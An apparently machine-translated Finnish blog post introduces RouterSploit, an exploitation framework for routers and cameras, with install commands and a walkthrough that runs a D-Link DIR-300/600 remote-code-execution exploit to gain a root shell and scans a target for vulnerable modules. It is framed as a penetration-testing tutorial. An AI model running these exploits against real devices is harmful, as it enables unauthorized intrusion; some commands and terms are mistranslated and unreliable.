
RouterSploit on hämmästyttävä hyödyntämiskehys, joka on tehty erityisesti sulautetuille laitteille.
Pentester voi käyttää tätä työkalua kameroiden ja reitittimien turvallisuuden tarkistamiseen.
RouterSploit Highlights:
- Koodattu Pythonissa.
- Komentorivikäyttöliittymä.
- Docker-tuki.
- Modulaariset työkalut.
Tuettu käyttöjärjestelmä:
- Mac käyttöjärjestelmä.
- Linux.
- Android-puhelin.
- Windows.
RouterSploitin asentaminen:
Vaatimukset:
- tulevaisuutta
- pyynnöt
- paramiko
- pysnmp
- pycrypto
Valinnainen:
- sininen – bluetooth vähän energiaa
Asennus Kali Linuxiin:
Noudata alla olevia komentoja:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy -tuki:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Asennus Ubuntuun:
Noudata alla olevia komentoja:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy -tuki:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Asennus MacOS:ään:
Noudata alla olevia komentoja:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Asennus Dockeriin:
Noudata alla olevia komentoja:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
Kuinka päivittää RouterSploit?
Sinun on päivitettävä RouterSploit usein hankaluuksien välttämiseksi.
Uusia moduuleja toimitetaan lähes joka päivä.
cd routersploit
git pull
RouterSploitin käyttäminen?
Käyttö
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ \_| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Hyödyntäminen Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.3.0 Kotisivu : https://www.threat9.com/ - @threatnine Join Slack : routersploit.slack.com Join Threat9 Beta Program - https://www.threat9.com/ Exploits: 128 Skannerit: 4 Creds: 165 Yleinen: 4 Hyötykuormat: 32 Enkooderit: 6 rsf >
Hyökkäykset:
Edistää hyväksikäyttöä, valitse vain moduuli ja aseta tavoite:
rsf > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Täydennä sarkainnäppäintä.
Vaihtoehtojen näyttäminen, tyyppishow
:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
Nimi Nykyiset asetukset Kuvaus
---- ---------------- -----------
kohde Kohdeosoite esim. http://192.168.1.1
portti 80 Kohdeportti
Käyttäärun
taiexploit
komento hyödyntää kohdetta:
rsf (D-LINK DIR-300 & DIR-600 RCE) > juosta
[+] Kohde on haavoittuvainen
[*] Kutsutaan komentosilmukkaa...
cmd > whoami
root
Vaihtoehtojen asettaminen:
rsf (D-LINK DIR-300 & DIR-600 RCE) > aseta tavoite http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
On mahdollista tarkistaa, onko kohde alttiina tietylle hyväksikäytölle:
rsf (D-LINK DIR-300 & DIR-600 RCE) > tarkistaa [+] Kohde on haavoittuvainen
Juostashow info
näyttääksesi tietoja hyväksikäytöstä.
Haavoittuvien kohteiden etsiminen:
Skannerit mahdollistavat nopean varmistuksen, onko kohde alttiina hyväksikäytölle.
Käytä samoja komentoja vaihtoehtojen näyttämiseen/asettamiseksi, ja myös juosta.
rsf (D-Link skanneri) > juosta [+] exploits/dlink/dwr_932_info_disclosure on haavoittuvainen [-] exploits/dlink/dir_300_320_615_auth_bypass ei ole haavoittuvainen [-] exploits/dlink/dsl_2750b_info_disclosure ei ole haavoittuvainen [-] exploits/dlink/dns_320l_327l_rce ei ole haavoittuvainen [-] exploits/dlink/dir_645_password_disclosure ei ole haavoittuvainen [-] exploits/dlink/dir_300_600_615_info_disclosure ei ole haavoittuva [-] exploits/dlink/dir_300_600_rce ei ole haavoittuvainen [+] Laite on haavoittuvainen! - exploits/dlink/dwr_932_info_disclosure
Lue myös: 1337x välityspalvelin
Viimeiset sanat:
RouterSploit on mahtava työkalu käyttää.
Jos kohtaat ongelmia liittyen RouterSploit. Muista kommentoida alle. Tiimimme CSHAWK ottaa sinuun yhteyttä mahdollisimman pian.